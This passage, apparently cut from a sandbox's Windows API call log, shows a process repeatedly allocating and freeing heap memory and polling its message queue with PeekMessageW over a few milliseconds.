hHeap=0x12c0000) returned 1 [0121.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb68 | out: hHeap=0x12c0000) returned 1 [0121.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda18 | out: hHeap=0x12c0000) returned 1 [0121.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918d8 | out: hHeap=0x12c0000) returned 1 [0121.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x133c448 | out: hHeap=0x12c0000) returned 1 [0121.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0121.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.165] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.165] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa10 [0121.165] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0121.165] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3e8 [0121.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda00 [0121.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0121.166] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdad8 [0121.166] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0121.166] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.166] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda00 | out: hHeap=0x12c0000) returned 1 [0121.167] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdad8 | out: hHeap=0x12c0000) returned 1 [0121.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3e8 | out: hHeap=0x12c0000) returned 1 [0121.168] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff280 [0121.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdbf8 [0121.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0121.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb20 [0121.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb20 | out: hHeap=0x12c0000) returned 1 [0121.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdbf8 | out: hHeap=0x12c0000) returned 1 [0121.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff280 | out: hHeap=0x12c0000) returned 1 [0121.169] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0121.169] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0121.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef990 [0121.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef990 | out: hHeap=0x12c0000) returned 1 [0121.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0121.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458898 [0121.169] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0121.169] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef960 [0121.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0121.169] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0121.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0121.169] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0121.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0121.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.170] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.170] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef980 [0121.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0121.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b58 [0121.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b58 | out: hHeap=0x12c0000) returned 1 [0121.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.170] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0121.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0121.170] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.175] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0121.175] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.175] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0121.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d58 [0121.176] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d58 | out: hHeap=0x12c0000) returned 1 [0121.176] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa10 [0121.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0121.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0121.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0121.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0121.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0121.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458918 [0121.176] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.176] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458918 | out: hHeap=0x12c0000) returned 1 [0121.176] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8d0 [0121.176] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0121.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0121.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0121.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0121.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0121.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0121.177] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0121.177] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a78 [0121.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a78 | out: hHeap=0x12c0000) returned 1 [0121.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0121.177] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.177] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0121.177] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef980 [0121.177] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0121.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0121.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0121.178] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0121.178] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef930 [0121.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0121.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0121.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef930 | out: hHeap=0x12c0000) returned 1 [0121.178] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.178] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0121.179] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0121.179] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9e0 [0121.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef970 [0121.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0121.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918d8 | out: hHeap=0x12c0000) returned 1 [0121.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0121.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9e0 | out: hHeap=0x12c0000) returned 1 [0121.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0121.179] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef920 [0121.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0121.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb80 [0121.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb80 | out: hHeap=0x12c0000) returned 1 [0121.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0121.179] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0121.179] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.179] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef960 [0121.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0121.180] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0f0 [0121.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0121.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef920 [0121.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0121.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300ea8 [0121.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd580 [0121.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0121.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0121.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0121.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0121.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0121.181] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0121.181] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9e0 [0121.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa70 [0121.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b78 [0121.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b78 | out: hHeap=0x12c0000) returned 1 [0121.181] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa70 | out: hHeap=0x12c0000) returned 1 [0121.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0121.181] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.181] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.181] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa70 [0121.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0121.182] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.182] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef970 [0121.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa10 [0121.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0121.182] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.182] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0121.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.182] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.183] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef970 [0121.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0121.184] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.184] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0121.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef930 [0121.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491818 [0121.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d58 [0121.185] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.185] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef930 [0121.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9e0 [0121.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0121.185] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.185] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491918 [0121.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0121.186] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.186] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efaa0 [0121.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0121.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.186] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.186] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.186] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff398 